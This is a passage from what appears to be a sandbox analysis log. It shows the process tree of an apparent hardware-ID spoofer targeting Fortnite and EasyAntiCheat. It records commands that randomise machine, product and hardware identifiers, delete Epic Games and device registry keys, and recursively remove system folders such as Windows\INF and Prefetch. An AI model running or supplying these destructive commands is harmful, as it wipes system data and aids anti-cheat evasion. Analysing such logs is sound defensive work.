    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\FortniteGame\Saved
    3⤵
    PID:2424
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v GUID /t REG_SZ /d {%random%-%random%-%random%-%random%%random%} /f
    3⤵
    PID:2868
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v GUID /t REG_SZ /d {24188-20679-13741-1820014382} /f
      4⤵
      Modifies registry key
      PID:1536
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\Explorer\IconCacheToDelete
    3⤵
    PID:204
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\INF
    3⤵
    - Drops file in Windows directory
    PID:1528
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d %random% /f
    3⤵
    PID:200
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d 24188 /f
      4⤵
      Modifies registry key
      PID:2880
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOwner /t REG_SZ /d %random% /f
    3⤵
    PID:1868
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOwner /t REG_SZ /d 24188 /f
      4⤵
      PID:1060
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOrganization /t REG_SZ /d %random% /f
    3⤵
    PID:1352
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOrganization /t REG_SZ /d 24188 /f
      4⤵
      PID:840
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d %random%-%random%-%random%-%random% /f
    3⤵
    PID:836
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d 24188-20679-13741-18200 /f
      4⤵
      Modifies registry key
      PID:1416
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d %random%-%random%-%random%-%random% /f
    3⤵
    PID:1616
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d 24188-20679-13741-18200 /f
      4⤵
      Modifies registry key
      PID:2532
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d %random%-%random%-%random%-%random% /f
    3⤵
    PID:1480
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d 24188-20679-13741-18200 /f
      4⤵
      PID:872
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_SZ /d %random% /f
    3⤵
    PID:2460
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_SZ /d 24188 /f
      4⤵
      PID:2864
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_SZ /d %random% /f
    3⤵
    PID:2608
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_SZ /d 24188 /f
      4⤵
      Modifies registry key
      PID:2168
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\ProgramData\%username%\Microsoft\XboxLive\NSALCache
    3⤵
    PID:3044
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\Prefetch
    3⤵
    PID:2792
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLabEx /t REG_SZ /d %random% /f
    3⤵
    PID:2780
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLabEx /t REG_SZ /d 24188 /f
      4⤵
      PID:1448
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:2328
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {%random%-%random%-%random%-%random%} /f
    3⤵
    PID:2036
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {24188-20679-13741-18200} /f
      4⤵
      Modifies registry key
      PID:2056
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\CrashReportClient
    3⤵
    PID:1684
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\temp
    3⤵
    PID:2700
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG delete HKCU\Software\Epic" "Games /f
    3⤵
    PID:832
  - - C:\Windows\system32\reg.exe
      REG delete HKCU\Software\Epic" "Games /f
      4⤵
      PID:2840
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\Logs
    3⤵
    PID:3060
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d %random%-%random%-%random%-%random%%random% /f
    3⤵
    PID:1108
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d 24188-20679-13741-1820014382 /f
      4⤵
      PID:2000
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\SettingSync\metastore
    3⤵
    PID:1032
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:2184
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Classes\com.epicgames.launcher /f
    3⤵
    PID:2304
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Classes\com.epicgames.launcher /f
      4⤵
      Modifies registry key
      PID:448
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\ProgramData\Microsoft\Windows\WER\Temp
    3⤵
    PID:2424
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\WOW6432Node\EpicGames /f
    3⤵
    PID:2888
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\WOW6432Node\EpicGames /f
      4⤵
      PID:232
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD\DxCache
    3⤵
    PID:2868
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\WOW6432Node\Epic" "Games /f
    3⤵
    PID:200
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\WOW6432Node\Epic" "Games /f
      4⤵
      PID:2320
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\Prefetch
    3⤵
    PID:1060
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKCR\com.epicgames.launcher /f
    3⤵
    PID:2416
  - - C:\Windows\system32\reg.exe
      reg delete HKCR\com.epicgames.launcher /f
      4⤵
      PID:836
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\ProgramData\USOShared\Logs
    3⤵
    PID:2288
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /a:h /a:a /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\WebCache\*.*
    3⤵
    PID:2476
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SYSTEM\MountedDevices /f
    3⤵
    PID:1376
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\MountedDevices /f
      4⤵
      Modifies registry key
      PID:2692
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\Engine\Plugins
    3⤵
    PID:2656
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
    3⤵
    PID:1036
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
      4⤵
      PID:2336
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\Plugins
    3⤵
    PID:1588
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
    3⤵
    PID:2876
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
      4⤵
      PID:2612
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\PersistentDownloadDir
    3⤵
    PID:2916
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
    3⤵
    PID:2536
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
      4⤵
      PID:2780
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:2812
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
    3⤵
    PID:2504
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
      4⤵
      PID:2036
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:2488
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C del /f /s /q %systemdrive%\ProgramData\Microsoft\DataMart\PaidWiFi\NetworksCache
    3⤵
    PID:2316
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\LastEnum /f
    3⤵
    PID:2784
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\LastEnum /f
      4⤵
      PID:1676
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C del /f /s /q %systemdrive%\ProgramData\Microsoft\DataMart\PaidWiFi\Rules
    3⤵
    PID:2080
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:3060
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d 24192-31427-316059496 /f
      4⤵
      PID:1364
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Cache
    3⤵
    PID:2000
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:1108
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d 24192-31427-316059496 /f
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      PID:2632
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:448
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d 24192-31427-316059496 /f
      4⤵
      PID:1088
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir / s / q %systemdrive%\Users\%username%\AppData\Local\Temp
    3⤵
    PID:1476
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:984
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
    3⤵
    PID:556
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
      4⤵
      PID:2576
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\FortniteGame\Saved
    3⤵
    PID:1868
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:1960
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d 24192-31427-316059496 /f
      4⤵
      PID:840
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\INF
    3⤵
    - Drops file in Windows directory
    PID:2572
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:1720
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d 24192-31427-316059496 /f
      4⤵
      PID:3048
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:616
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d 24195-9408-16702791 /f
      4⤵
      Modifies registry key
      PID:2188
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SYSTEM\MountedDevices /f
    3⤵
    PID:2128
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\MountedDevices /f
      4⤵
      PID:1528
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKCU\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\com.epicgames.launcher /f
    3⤵
    PID:2492
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\com.epicgames.launcher /f
      4⤵
      PID:2408
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
    3⤵
    PID:2224
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
      4⤵
      Modifies registry key
      PID:2168
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
    3⤵
    PID:860
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
      4⤵
      Modifies registry key
      PID:2720
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
    3⤵
    PID:1320
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
      4⤵
      Modifies registry key
      PID:2664
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
    3⤵
    PID:344
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
      4⤵
      PID:2536
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
    3⤵
    PID:2056
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
      4⤵
      Modifies registry key
      PID:3020
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKCU\Software\Classes\Interface /v ClsidStore /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:2036
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Classes\Interface /v ClsidStore /t REG_BINARY /d 241959408167027912243883728570105532546118962419524697 /f
      4⤵
      Modifies registry class
      PID:2488
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:1996
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d 24195-9408-16702791 /f
      4⤵
      PID:2840
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:2700
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d 24195-9408-16702791 /f
      4⤵
      PID:3000
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:1984
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d 24195-9408-16702791 /f
      4⤵
      PID:772
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\ProgramData\%username%\Microsoft\XboxLive
    3⤵
    PID:2160
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKCU\Software\Classes\Interface /v ClsidStore /f
    3⤵
    PID:2600
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Classes\Interface /v ClsidStore /f
      4⤵
      PID:208
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\Public\Documents
    3⤵
    PID:916
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v _DriverProviderInfo /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:2396
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v _DriverProviderInfo /t REG_SZ /d 24195-9408-16702791 /f
      4⤵
      PID:2096
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\Prefetch
    3⤵
    PID:2984
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:1508
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d 24195-9408-16702791 /f
      4⤵
      Modifies registry key
      PID:2880
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:2576
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SettingsRequests /f
    3⤵
    PID:224
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SettingsRequests /f
      4⤵
      PID:1060
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\CrashReportClient
    3⤵
    PID:840
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v BackupProductKeyDefault /f
    3⤵
    PID:1416
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v BackupProductKeyDefault /f
      4⤵
      PID:2692
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\temp
    3⤵
    PID:1164
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\SettingSync\metastore
    3⤵
    PID:1608
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v actionlist /f
    3⤵
    PID:616
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v actionlist /f
      4⤵
      PID:2460
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:2408
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
    3⤵
    PID:1764
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
      4⤵
      PID:1588
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\ProgramData\Microsoft\Windows\WER\Temp
    3⤵
    PID:1736
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD\DxCache
    3⤵
    PID:860
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist /f
    3⤵
    PID:2916
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist /f
      4⤵
      PID:1448
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:876
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKCU\Software\Hex-Rays\IDA\History /f
    3⤵
    PID:3020
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Hex-Rays\IDA\History /f
      4⤵
      PID:2452
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKCU\Software\Hex-Rays\IDA\History64 /f
    3⤵
    PID:2100
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Hex-Rays\IDA\History64 /f
      4⤵
      PID:2504
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\Prefetch
    3⤵
    PID:3012
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
    3⤵
    PID:2784
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
      4⤵
      PID:2572
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /a:h / a:a /q %systemdrive%\Users\username%\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\*.*
    3⤵
    PID:832
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:772
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d 241982015617982485412558127643168376261905857482404724741 /f
      4⤵
      PID:2160
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /a:h / a:a /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\WebCache\*.*
    3⤵
    PID:1756
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKCU\Software\Classes\Installer\Dependencies /v MSICache /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:2000
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Classes\Installer\Dependencies /v MSICache /t REG_BINARY /d 2419820156179824854125581276431683762619058574824047 /f
      4⤵
      Modifies registry class
      PID:2184
